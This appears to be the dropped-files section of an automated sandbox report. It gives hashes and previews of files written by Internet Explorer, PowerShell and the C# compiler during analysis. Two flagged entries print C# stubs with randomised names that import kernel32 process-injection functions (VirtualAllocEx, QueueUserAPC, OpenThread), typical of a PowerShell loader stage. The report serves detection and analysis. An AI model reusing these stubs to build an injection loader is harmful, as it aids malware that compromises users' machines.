Malicious:	false
Preview:	var _mNRequire,_mNDefine;!function(){"use strict";var c={},u={};function a(e){return"function"==typeof e}_mNRequire=function e(t,r){var n,i,o=[];for(i in t)t.hasOwnProperty(i)&&("object"!=typeof(n=t[i])&&void 0!==n?(void 0!==c[n]\|\|(c[n]=e(u[n].deps,u[n].callback)),o.push(c[n])):o.push(n));return a(r)?r.apply(this,o):o},_mNDefine=function(e,t,r){if(a(t)&&(r=t,t=[]),void 0===(n=e)\|\|""===n\|\|null===n\|\|(n=t,"[object Array]"!==Object.prototype.toString.call(n))\|\|!a(r))return!1;var n;u[e]={deps:t,callback:r}}}();_mNDefine("modulefactory",[],function(){"use strict";var r={},e={},o={},i={},n={},t={},a={};function c(r){var e=!0,o={};try{o=_mNRequire([r])[0]}catch(r){e=!1}return o.isResolved=function(){return e},o}return r=c("conversionpixelcontroller"),e=c("browserhinter"),o=c("kwdClickTargetModifier"),i=c("hover"),n=c("mraidDelayedLogging"),t=c("macrokeywords"),a=c("tcfdatamanager"),{conversionPixelController:r,browserHinter:e,hover:i,keywordClickTargetModifier:o,mraidDelayedLogging:n,macroKeyw

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\otBannerSdk[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	372457
Entropy (8bit):	5.219562494722367
Encrypted:	false
SSDEEP:	6144:B0C8zZ5OVNeBNWabo7QtD+nKmbHgtTVfwBSh:B4zj7BNWaRfh
MD5:	DA186E696CD78BC57C0854179AE8704A
SHA1:	03FCF360CC8D29A6D63BE8073D0E52FFC2BDDB21
SHA-256:	F10DC8CE932F150F2DB28639CF9119144AE979F8209E0AC37BB98D30F6FB718F
SHA-512:	4DE19D4040E28177FD995D56993FFACB9A2A0A7AAB8265BD1BBC7400C565BC73CD61B916D23228496515C237EEA14CCC46839F507879F67BA510D97F46B63557
Malicious:	false
Preview:	/** .. * onetrust-banner-sdk.. * v6.7.0.. * by OneTrust LLC.. * Copyright 2020 .. */..!function () { "use strict"; var o = function (e, t) { return (o = Object.setPrototypeOf \|\| { __proto__: [] } instanceof Array && function (e, t) { e.__proto__ = t } \|\| function (e, t) { for (var o in t) t.hasOwnProperty(o) && (e[o] = t[o]) })(e, t) }; var r = function () { return (r = Object.assign \|\| function (e) { for (var t, o = 1, n = arguments.length; o < n; o++)for (var r in t = arguments[o]) Object.prototype.hasOwnProperty.call(t, r) && (e[r] = t[r]); return e }).apply(this, arguments) }; function l(s, i, a, l) { return new (a = a \|\| Promise)(function (e, t) { function o(e) { try { r(l.next(e)) } catch (e) { t(e) } } function n(e) { try { r(l.throw(e)) } catch (e) { t(e) } } function r(t) { t.done ? e(t.value) : new a(function (e) { e(t.value) }).then(o, n) } r((l = l.apply(s, i \|\| [])).next()) }) } function k(o, n) { var r, s, i, e, a = { label: 0, sent: function () { if (1 & i[0]) throw i[1]

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	11606
Entropy (8bit):	4.883977562702998
Encrypted:	false
SSDEEP:	192:Axoe5FpOMxoe5Pib4GVsm5emdKVFn3eGOVpN6K3bkkjo5HgkjDt4iWN3yBGHh9sO:6fib4GGVoGIpN6KQkj2Akjh4iUxs14fr
MD5:	1F1446CE05A385817C3EF20CBD8B6E6A
SHA1:	1E4B1EE5EFCA361C9FB5DC286DD7A99DEA31F33D
SHA-256:	2BCEC12B7B67668569124FED0E0CEF2C1505B742F7AE2CF86C8544D07D59F2CE
SHA-512:	252AD962C0E8023419D756A11F0DDF2622F71CBC9DAE31DC14D9C400607DF43030E90BCFBF2EE9B89782CC952E8FB2DADD7BDBBA3D31E33DA5A589A76B87C514
Malicious:	false
Preview:	PSMODULECACHE......P.e...S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........7r8...C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	0.9260988789684415
Encrypted:	false
SSDEEP:	3:Nlllulb/lj:NllUb/l
MD5:	13AF6BE1CB30E2FB779EA728EE0A6D67
SHA1:	F33581AC2C60B1F02C978D14DC220DCE57CC9562
SHA-256:	168561FB18F8EBA8043FA9FC4B8A95B628F2CF5584E5A3B96C9EBAF6DD740E3F
SHA-512:	1159E1087BC7F7CBB233540B61F1BDECB161FF6C65AD1EFC9911E87B8E4B2E5F8C2AF56D67B33BC1F6836106D3FEA8C750CC24B9F451ACF85661E0715B829413
Malicious:	false
Preview:	@...e................................................@..........

C:\Users\user\AppData\Local\Temp\RES3736.tmp Download File
Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
File Type:	data
Category:	dropped
Size (bytes):	2184
Entropy (8bit):	2.711532182711908
Encrypted:	false
SSDEEP:	24:pguMJygwXhH8lhKdNNI+ycuZhNdakSbPNnq9qpie9Ep:KuNxcTKd31ulda3Rq9N
MD5:	1880A62313708386F3F8C76F83E678E9
SHA1:	E319A0DC4A32DF2B190069C8E1D4211EEEFFC32B
SHA-256:	4559FD4BA220B41C1EB6F5550221E405F9AEB587584855B0A615B511BE253717
SHA-512:	677248A17A9F614F254CF66F81B8CCF656171F4054586DFC9A2CEC0881FEEB2D8BBC07AC9E922931256DFD44482138BB9FF88A10A502F0452A32A6AD83B059C1
Malicious:	false
Preview:	........T....c:\Users\user\AppData\Local\Temp\kboh4jur\CSC3D4FC79349B84E14A11DB5BE381E50D0.TMP.................C."Ei..._f..{u..........4.......C:\Users\user\AppData\Local\Temp\RES3736.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\RES48CA.tmp Download File
Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
File Type:	data
Category:	dropped
Size (bytes):	2184
Entropy (8bit):	2.7118201719490695
Encrypted:	false
SSDEEP:	24:pgdLE0f84hHBhKdNNI+ycuZhN/4akSetPNnq9qple9Ep:KdLx80vKd31ulwa3Mq9W
MD5:	6D3606C18C74E00409A142A1BD82C885
SHA1:	B368C1D44E88E3ADB444FBCCED0604ACF440A73D
SHA-256:	22C462CC31BB19AE383D286D9F2C5C52879735425E3C0DE1A0392A52453536F1
SHA-512:	0B74A23BD657EED81C3C300803E7F4962E697DE41EB4D0AE5AD0F5804BEE29CDC7EEC22549A5830499DBAFADED6016EEC09B23EC1EA116FDE61A39AAFEFAC042
Malicious:	false
Preview:	........T....c:\Users\user\AppData\Local\Temp\xjciegge\CSCE781F4B6FB444C94B757D31BBD45D613.TMP...............d....&9.y...W...........4.......C:\Users\user\AppData\Local\Temp\RES48CA.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_clbvvsrw.svz.ps1 Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ubjgidw2.ni0.psm1 Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\kboh4jur\CSC3D4FC79349B84E14A11DB5BE381E50D0.TMP Download File
Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	MSVC .res
Category:	dropped
Size (bytes):	652
Entropy (8bit):	3.105416789274113
Encrypted:	false
SSDEEP:	12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryfak7YnqqbPN5Dlq5J:+RI+ycuZhNdakSbPNnqX
MD5:	C40C43D8224569A0D1FE5F6684157B75
SHA1:	A163827997D8AB2CC06EA98B7D56BCAF1FFC9E36
SHA-256:	D318BE576194A33502EE347F86D74D3118C42F4B51D47D878B3B069D2D923C2B
SHA-512:	F785FB597275DB89571F16311EBFA74D18DEEB71FA599228A805D55689C75959CCFBD489B29553297DC42C91EABB2B633D92C96189AB14DC6895C471F8F9B658
Malicious:	false
Preview:	.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...k.b.o.h.4.j.u.r...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...k.b.o.h.4.j.u.r...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

C:\Users\user\AppData\Local\Temp\kboh4jur\kboh4jur.0.cs Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text
Category:	dropped
Size (bytes):	407
Entropy (8bit):	5.035115712763213
Encrypted:	false
SSDEEP:	6:V/DsYLDS81zuJQJD52mMRSR7a1u7XLTYaSRa+rVSSRnA/fTLZfxkeYy:V/DTLDfuSD5957bm9rV5nA/7nkeYy
MD5:	E6783D4478DED333CF3CDF5890B4797B
SHA1:	25794B2DE4EA900DBC1FB77CC87A492F96627027
SHA-256:	679B90A8046177D7F89C8FCE2FA5CF91C548FD819E0E5272651BA2F655594770
SHA-512:	C69F10EABD5A149131A7F821058F4BC75F69C87A8BBF9E130BB7B4739A5358837F151416D0354D1AD4C5A7CEEAE5ED1783D562D1AF155C01988CCD19C8B7835A
Malicious:	false
Preview:	.using System;.using System.Runtime.InteropServices;..namespace W32.{. public class suelfpv. {. [DllImport("kernel32")].public static extern uint QueueUserAPC(IntPtr wlxurbg,IntPtr fvrp,IntPtr mndgmuh);.[DllImport("kernel32")].public static extern IntPtr GetCurrentThreadId();.[DllImport("kernel32")].public static extern IntPtr OpenThread(uint yslxywxn,uint lkmfqiek,IntPtr alwfjlwx);.. }..}.

C:\Users\user\AppData\Local\Temp\kboh4jur\kboh4jur.cmdline Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	369
Entropy (8bit):	5.295779216469243
Encrypted:	false
SSDEEP:	6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2WXp+N23fNUzxs7+AEszIWXp+N23f3n:p37Lvkmb6KHqWZE8P
MD5:	F2F0C0CF43A777290E8BB58D45FA64F2
SHA1:	4B14E9D72A183B86294E6028CD30197F078B765E
SHA-256:	D32B322FCC2F6B001F8217B22E74125F4B590A611B0417CA0B826BF8E8B04724
SHA-512:	CB5072D687B41AD25B5B87C0E2C6F05EF91E127BF146933999F457E90295B008DFDF9DEE50991929749137CE56FC9EB916E98D8EE55D71B5A03C10E967BFD787
Malicious:	true
Preview:	./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\kboh4jur\kboh4jur.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\kboh4jur\kboh4jur.0.cs"

C:\Users\user\AppData\Local\Temp\kboh4jur\kboh4jur.dll Download File
Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3584
Entropy (8bit):	2.6206819701646586
Encrypted:	false
SSDEEP:	24:etGSHs8mmDg85JuiwViswHdEAe5G4QstkZf9Y0Lhkh+I+ycuZhNdakSbPNnq:6HOmb5Jb+iswLIYJ9Y0dK+1ulda3Rq
MD5:	07C2BC9B2B5354817F798B74063092B0
SHA1:	EF21B34723FC4C48A83893DA4FDFE820EAF39FF0
SHA-256:	68752F4F8746F0A04502CEE52E62C8E704AE6A362B07A98056875B9A635D96F9
SHA-512:	592A2CF5A3E6100FB4E807286C3530388ADC95012C73D0A642BD4F187EDFB4853854B298C935CFF0BA4866AAB5B1FAA30265C6A0D87949AB929F4D74BCC72FC9
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...f=.`...........!.................$... ...@....... ....................................@..................................#..S....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B..................(....BSJB............v4.0.30319......l...H...#~......@...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................3.,...............!...................................... :............ G............ Z.....P ......e.........k.....s.....x.....................e. ...e...!.e.%...e............3.4.....:.......G.......Z.......................................#........<Module>.kboh4jur.dll.suelfpv.W32.mscorlib.

C:\Users\user\AppData\Local\Temp\kboh4jur\kboh4jur.out Download File
Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	ASCII text, with CRLF, CR line terminators
Category:	modified
Size (bytes):	412
Entropy (8bit):	4.871364761010112
Encrypted:	false
SSDEEP:	12:zKaMK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:zKaM5DqBVKVrdFAMBJTH
MD5:	83B3C9D9190CE2C57B83EEE13A9719DF
SHA1:	ABFAB07DEA88AF5D3AF75970E119FE44F43FE19E
SHA-256:	B5D219E5143716023566DD71C0195F41F32C3E7F30F24345E1708C391DEEEFDA
SHA-512:	0DE42AC5924B8A8E977C1330E9D7151E9DCBB1892A038C1815321927DA3DB804EC13B129196B6BC84C7BFC9367C1571FCD128CCB0645EAC7418E39A91BC2FEDB
Malicious:	false
Preview:	Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

C:\Users\user\AppData\Local\Temp\xjciegge\CSCE781F4B6FB444C94B757D31BBD45D613.TMP Download File
Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	MSVC .res
Category:	dropped
Size (bytes):	652
Entropy (8bit):	3.0859409132237605
Encrypted:	false
SSDEEP:	12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryvNIvak7YnqqUNIIPN5Dlq5J:+RI+ycuZhN/4akSetPNnqX
MD5:	64EDC9D988FD2639CFAC79BBAA9357AA
SHA1:	F0988F99B0A61821890D63D7C7249D785D8992F8
SHA-256:	AA6A7ED4E5D73C04D075C1230E19DBFADF17B1CEC9D8AC6BF7A8FCA37D207C67
SHA-512:	65E3D7B3B201E1C45B7CE909FFEF0973A15B2BF7C43990A2ADD33D12CC0A662EEFEF1C65F02E06F857D6D5EE8C646F250839AEDF99A09B3E9EE7C72CAD33B72D
Malicious:	false
Preview:	.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...x.j.c.i.e.g.g.e...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...x.j.c.i.e.g.g.e...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

C:\Users\user\AppData\Local\Temp\xjciegge\xjciegge.0.cs Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text
Category:	dropped
Size (bytes):	408
Entropy (8bit):	4.973066216461546
Encrypted:	false
SSDEEP:	12:V/DTLDfuNHd9eg5r31vuEAiCM7nPXQEQy:JjmN9cKrFvuEtQy
MD5:	B51D375352619766FF9E41EF8E39C000
SHA1:	AED407136DB175CB13331C6203781C7A29414F8C
SHA-256:	DA74E408FA077334B3B0F9602FE873D56965700477997BE9D04C0722AE3546A7
SHA-512:	47FD32E119F256D5633D3ACF734BFD14BE379FA3435247B9562097076C0A0ABEF195E4B0BCFF4A599157045AB1B67A146D569607DED82D39D1497B0BD0794866
Malicious:	true
Preview:	.using System;.using System.Runtime.InteropServices;..namespace W32.{. public class gndonb. {. [DllImport("kernel32")].public static extern IntPtr GetCurrentProcess();.[DllImport("kernel32")].public static extern void SleepEx(uint eehlvt,uint oss);.[DllImport("kernel32")].public static extern IntPtr VirtualAllocEx(IntPtr dvqre,IntPtr cdlndr,uint fjupsxieyb,uint sasbsnxr,uint pjgvhw);.. }..}.

C:\Users\user\AppData\Local\Temp\xjciegge\xjciegge.cmdline Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	369
Entropy (8bit):	5.2618141748062115
Encrypted:	false
SSDEEP:	6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2WXp+N23f1CeCuGzxs7+AEszIWXp+N23f1Cer:p37Lvkmb6KHdDXGWZE8dDXb
MD5:	3337F9F6F364EF4ED71E25EC3B7A28A7
SHA1:	C788759FCD13E0C4948E1DAA13720E0BAF84BB30
SHA-256:	6E8A5F6F6543E890A49A5FED72AB1BB29A6100A84D306B13F2AC0F87AB41914F
SHA-512:	EE86600E4B41C76AD05BDF80B9EFC68B0237F49732771FCC319038BEB4F792286AC3CD324A003718F526785258DABB6BF926AB765995070A35CDE491D334C39C
Malicious:	false
Preview:	./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\xjciegge\xjciegge.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\xjciegge\xjciegge.0.cs"

C:\Users\user\AppData\Local\Temp\xjciegge\xjciegge.dll Download File
Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3584
Entropy (8bit):	2.6117615167180035
Encrypted:	false
SSDEEP:	24:etGSUs8mmEer8MTz7e5dab9eWCM/BdWeGtkZfwSIEhgXI+ycuZhN/4akSetPNnq:6UOLrMT4kCcWeJJwNqgX1ulwa3Mq
MD5:	1CEE36A4AD945292060DF61E9C56490D
SHA1:	A44A67802B2279110234138C3F689C895FFE8E7D
SHA-256:	1B37D5989DAC8051F40247A1F658ECB53C79D3CC0A378E09DA37121BCCAD15D7
SHA-512:	BF0BA7FD361EC4A6C64C712F33E74E5A274C1FF0C7264D7B5110176C2F8E2474D157E730CA5BB09BDE7D07AE0C2E18FB984098516A934D15DF423616B4F1B782
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...k=.`...........!.................$... ...@....... ....................................@..................................#..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B..................(....*BSJB............v4.0.30319......l...P...#~......@...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................2.+...............!...................................... 9............ K............ S.....P ......b.........h.....o.....s.....y.....................b.!...b...!.b.&...b.......+.....4.4.....9.......K.......S......................................."..........<Module>.xjciegge.dll.gndonb.W32.ms

C:\Users\user\AppData\Local\Temp\xjciegge\xjciegge.out Download File
Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	ASCII text, with CRLF, CR line terminators
Category:	modified
Size (bytes):	412
Entropy (8bit):	4.871364761010112
Encrypted:	false
SSDEEP:	12:zKaMK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:zKaM5DqBVKVrdFAMBJTH
MD5:	83B3C9D9190CE2C57B83EEE13A9719DF
SHA1:	ABFAB07DEA88AF5D3AF75970E119FE44F43FE19E
SHA-256:	B5D219E5143716023566DD71C0195F41F32C3E7F30F24345E1708C391DEEEFDA
SHA-512:	0DE42AC5924B8A8E977C1330E9D7151E9DCBB1892A038C1815321927DA3DB804EC13B129196B6BC84C7BFC9367C1571FCD128CCB0645EAC7418E39A91BC2FEDB
Malicious:	false
Preview:	Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

C:\Users\user\AppData\Local\Temp\~DF1305D8C42BDE9759.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	39633
Entropy (8bit):	0.5703763021989672
Encrypted:	false
SSDEEP:	192:kBqoxKAuqR++4y7oe6jx6qO6jx6qO6jx6qH:kBqoxKAuqR++4y7oerxr9rC
MD5:	867570B3FDF6B5122CB7400C96E8F501
SHA1:	5286811C247B908BB00FC04A3B2A6B94456F4205
SHA-256:	1C7C736FAF4F4E472971153CCB053B102349470AEC3BA92F4891EC4B3B05DD13
SHA-512:	96411F6908B2648EFA20B79E67B7B9581A7473CDCC801BB35DB513B00A02930E5703376393182D8893AC70A26C440C97CAD24F4AAC8D3D736B9D76861DED6280
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF24569624759CC30D.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	188400
Entropy (8bit):	3.1308085890047397
Encrypted:	false
SSDEEP:	3072:bZ/2BfcYmu5kLTzGtRZ/2Bfc/mu5kLTzGt:CQ
MD5:	B7FCBBBCC2A17510F1266CEA78326B35
SHA1:	E8980575750FC4A2B551441FDE49852515858BC9
SHA-256:	BB65DFB747314C1F450A55B93F914641FD1CE02E45CCEDB558EF5552CBC55299
SHA-512:	F382F9D05CC01CE257131A2A393CD54CF46D090B1096E30C4D74A5B892879181CF35CF4ECAC3193A35B03516B6BE7994B387A6AE39E896BC24D3B8205191EC6F
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF55EEAABB3F13D2AA.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	14277
Entropy (8bit):	1.1318967394932926
Encrypted:	false
SSDEEP:	48:kBqoIg+n1PGKKHBomrkjLVrOQcrKSC2c/rgyKN:kBqoIg+TmC2Fp
MD5:	ECB2C9EF3B13DB481C023CAB1CFBE5DF
SHA1:	2BBED1D6A05D7F5524309F18D49E64AF52261EF1
SHA-256:	8F0D8D676BA19103DA9F6BE3E53EEF8D6A1FB864B1A7B49B6EE934DA06F2220F
SHA-512:	DFC3D57752409D29529D92E317EF8FE898891AB1D85865DF9E72B48E6396EFA63DED23938563F73A78F6E34D2DE6A6EDF867065CB2979F0A407F32CB96F9FA59
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DFAFFED478F38F39DF.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	39609
Entropy (8bit):	0.5661742854330173
Encrypted:	false
SSDEEP:	96:kBqoxKAuvScS+npLCJnm1GiXm1Ginm1GiM:kBqoxKAuqR+npLCJnmpXmpnmpM
MD5:	B0DC5E370C438E8A80066BB68358021A
SHA1:	C34923AD8D7C7468BB67E9D0E20B9A99ED9A0122
SHA-256:	7EDD3193931EE713256C4C298647F86176AD9F409587116BD3EAD9C41CA11389
SHA-512:	C6EA88B6CF96B5148AFD022FCCE6550A68D2AB7E084CF2D7E714043B8655AE977755FECA85DC66FCE6562D6DF92C43D355EA79663030758B8B79C3EDDF0ABEBF
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DFCCBD6BB222DE39CF.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	39657
Entropy (8bit):	0.5787848624708839
Encrypted:	false
SSDEEP:	192:kBqoxKAuqR+QWMNWkk4bmJbk4bmJrk4bmJQ:kBqoxKAuqR+QWMNWkk7bk7rk7Q
MD5:	13578A4540B0CAE74927077ED1B8CA3E
SHA1:	EBB9E4777AC832426856650633D8B44B64C94B03
SHA-256:	677B110D64581AA6E6AEED7E362E01995FA29542B3D9A3C85A2222F2F75E619D
SHA-512:	4AD40DA5162CFD8632CD203A8A80216A188E4BDD3E53C028BB2D4D0DEC67B8DC92DA08BA45104FB413B8BE19FC7E558D434BBCBF476811F9B00149E5D762EA59
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DFF6E5087B4A56C4FB.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	modified
Size (bytes):	25441
Entropy (8bit):	0.27918767598683664
Encrypted:	false
SSDEEP:	24:c9lLh9lLh9lIn9lIn9lRx/9lRJ9lTb9lTb9lSSU9lSSU9laAa/9laA:kBqoxxJhHWSVSEab
MD5:	AB889A32AB9ACD33E816C2422337C69A
SHA1:	1190C6B34DED2D295827C2A88310D10A8B90B59B
SHA-256:	4D6EC54B8D244E63B0F04FBE2B97402A3DF722560AD12F218665BA440F4CEFDA
SHA-512:	BD250855747BB4CEC61814D0E44F810156D390E3E9F120A12935EFDF80ACA33C4777AD66257CCA4E4003FEF0741692894980B9298F01C4CDD2D8A9C7BB522FB6
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

